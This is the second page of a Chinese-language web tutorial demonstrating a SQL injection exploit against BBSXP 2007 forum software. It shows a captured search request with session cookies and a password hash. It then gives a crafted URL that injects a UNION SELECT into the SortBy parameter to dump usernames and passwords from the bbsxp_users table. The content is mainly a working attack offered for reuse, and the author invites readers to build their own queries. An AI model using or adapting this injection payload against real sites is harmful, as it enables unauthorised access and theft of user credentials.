[组图]BBSXP 2007的漏洞利用演示
热 荐 ★★★★
BBSXP 2007的漏洞利用演示
然后点“搜索”,搜索一下刚才的帖子。如图二:
这时候进行抓包。抓包后的结果:
POST /bbsxp/Search.asp?menu=Result HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://192.168.1.106/bbsxp/Search.asp?ForumID=1
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 192.168.1.106
Content-Length: 79
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ForumNameList=%3Coption%20value%3D%27ShowForum.asp%3FForumID%3D1%27%3E111%3C/option%3E; Themes=default; ASPSESSIONIDQCSBDDCT=HMIHPBPADLHDJPLCKOHKJBMM; Invisible=0; UserID=2; Userpass=7C4A8D09CA3762AF61E59520943DC26494F8941B
Keywords=test&Item=Topic&DateComparer=365&SortBy=Desc&ForumID=1&VerifyCode=9915
好了,这时候,我们就可以自行构造了,比如我构造如下语句:
以下是引用片段:
http://192.168.1.106/bbsxp/Search.asp?menu=Result&Keywords=test&Item=Topic&DateComparer=365&SortBy=Desc%20union%20select%201,1,1,1,userpass,username,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20[bbsxp_users]%20order%20by%20ThreadID&ForumID=1&VerifyCode=9915 |
就会出现如图三的效果:
相信大家看的很明显了,立刻暴出了用户名和相对应的密码。当然大家可以自行构造自己想要的语句,这里有两个问题没有解决:
一个就是BBSXP的40位加密问题、另外一个就是我说的是在极端条件下的注入方法,具体怎么饶过这个CHR(32)还在研究中,不知道是头脑发热还是没睡醒,既然BCT发布出来了,就一定有他的理由。
上一页 [1] [2]
您现在的位置: